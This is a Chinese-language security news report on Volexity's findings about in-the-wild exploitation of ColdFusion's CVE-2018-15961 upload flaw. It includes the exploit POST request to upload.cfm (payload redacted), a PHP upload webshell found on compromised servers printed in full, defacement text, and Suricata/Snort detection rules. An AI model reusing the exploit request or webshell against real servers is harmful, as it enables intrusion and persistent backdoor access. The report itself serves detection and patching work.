CVE-2018-15961在野利用

如果你的企业运行着ColdFusion网络版，那么你可能需要检查一下你的服务器了。Volexity研究人员近期发现Adobe ColdFusion CVE-2018-15961的漏洞利用。Adobe已经发布了该漏洞的补丁，并且没有公布该漏洞的详情和PoC。

Volexity检测到的攻击活动中，中国某APT组织直接上传了中国菜刀webshell来入侵有漏洞的ColdFusion服务器。因为目标服务器没有升级adobe发布的更新补丁。该漏洞CVE编号为CVE-2018-15961，影响版本包括ColdFusion 11、ColdFusion 2016、ColdFusion 2018等4年内发布的所有版本。

Adobe的ColdFusion web应用开发平台一直是APT组织攻击的目标。主流的ColdFusion包括WYSIWYG 富文本编辑器CKEditor。在过去的ColdFusion版本中，Adobe打包了原来的FCKeditor。Adobe在决定用FCKeditor替代CKEditor时，意外引入了一个新的非认证文件上传漏洞。该漏洞与2009年发现的FCKeditor非认证文件上传漏洞非常类似。

APT组织利用CVE-2018-15961漏洞

Volexity在Adobe发布该漏洞安全更新后约2周发现了该漏洞的在野利用。可以通过一个简单的HTTP POST请求到upload.cfm文件进行利用，upload.cfm是没有限制的，也不需要任何的认证。下面是解释该漏洞利用的POST请求：

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Content-Type: multipart/form-data; boundary=―――――――――5b12d3a3190134 Accept-Encoding: gzip, deflate Content-Length: 9308 Host: <hostname> Pragma: no-cache Connection: close ――――――――― 5b12d3a3190134 <redacted>

Volexity发现APT组织利用来漏洞来上传JSP版本的中国菜刀，并在允许通过CKEditor上传前在受感染的web服务器上执行命令。相关的配置文件settings.cfm如下所示：

<cfset settings.disfiles = “cfc,exe,php,asp,cfm,cfml”> CVE-2018-15961利用

在识别APT利用CVE-2018-15961后，Volexity检查了许多有网络连接的ColdFusion web服务器。这些服务器隶属于不同的组织，包括教育机构、州政府、医疗研究机构等。这些站点都有尝试webshell上传的痕迹。Volexity不能确认这些实例中是否有漏洞被滥用的情况。但是基于受感染的服务器上的文件，研究人员相信有非APT组织成员的用户在9月11日前已经识别了该漏洞。被入侵的网站上都有以下两个目录之一：

/cf_scripts/

/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/

大多数攻击实例中，这些文件的最后修改日期为6月2日或6月6日。许多网站上都有增加up.php.fla文件失败的遗留代码。.fla扩展并不常用，可能是因为攻击者没有发现.jsp文件扩展是允许上传的。

<?php
$files = @$_FILES[“files”];
if ($files[“name”] != ”) {
$fullpath = $_REQUEST[“path”] . $files[“name”];
if (move_uploaded_file($files[‘tmp_name’], $fullpath)) {
echo “<h1><a href=’$fullpath’>OK-Click here!</a></h1>”;
}
}echo ‘<html><head><title>Upload files…</title></head><body><form method=POST enctype=”multipart/form-data” action=””><input type=text name=path><input type=”file” name=”files”><input type=submit value=”Up”></form></body></html>’;
?>

许多受影响的网站都含有一个来自黑客组织TYPICAL IDIOT SECURITY的HTML index文件。网页内容如下：

Hacked by AnoaGhost Typical Idiot Security
#together laugh in ur security since 2k17#
We are:~Khunerable SPEEDY-03 PYS404 Mirav Grac3 AnoaGhost Jje Incovers Panataran magelangGetar Kersen.id

该黑客组织好像来自印度尼西亚，其成员AnoaGhost与支持ISIS的黑客组织有关联。

签名

以下入侵检测系统签名可以用于检测CVE-2018-15961滥用：

Suricata:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”Volex ColdFusion Unauthenticated Upload Attempt (upload.cfm)”; flow:to_server,established; content:”POST”; http_method; content:”upload.cfm?action=upload”; nocase; http_uri; sid:2018093003;)
Snort:
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:”Volex ColdFusion Unauthenticated Upload Attempt (upload.cfm)”; flow:to_server,established; content:”POST”; http_method; content:”upload.cfm?action=upload”; nocase; http_uri; sid:2018093003;) 建议

如果你的ColdFusion服务器有网络连接，那么可以检查一下日志文件和目录看是否有可疑文件。如果发现了可以的日志记录或文件，需要进行进一步的分析。

Volexity建议用户尽早更新Adobe ColdFusion补丁。最好的办法是在管理员面包中配置补丁升级。下图是Server Update>Updates>Settings的默认设置：